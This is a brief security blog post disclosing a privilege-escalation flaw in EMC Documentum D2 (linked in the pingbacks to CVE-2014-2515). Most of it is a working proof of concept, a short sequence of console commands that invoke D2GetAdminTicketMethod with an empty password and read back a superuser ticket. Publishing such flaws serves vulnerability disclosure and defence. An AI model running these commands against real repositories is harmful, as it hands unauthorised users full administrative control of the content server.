Documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

Any user can execute D2GetAdminTicketMethod to obtain a superuser’s ticket:

1> create c6_method_return object set message='test'
2> go
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
(1 row affected)

5 thoughts on “Documentum security vulnerabilities: D2GetAdminTicketMethod (D2)”

  1. Pingback: God bless EMC. Part IV | Documentum in a (nuts)HELL
  2. Pingback: Is it worth to treat flu if patient has cancer? | Documentum in a (nuts)HELL
  3. Pingback: CVE-2014-2515 (D2GetAdminTicketMethod). Was it really fixed? | Documentum in a (nuts)HELL
  4. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL
  5. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL
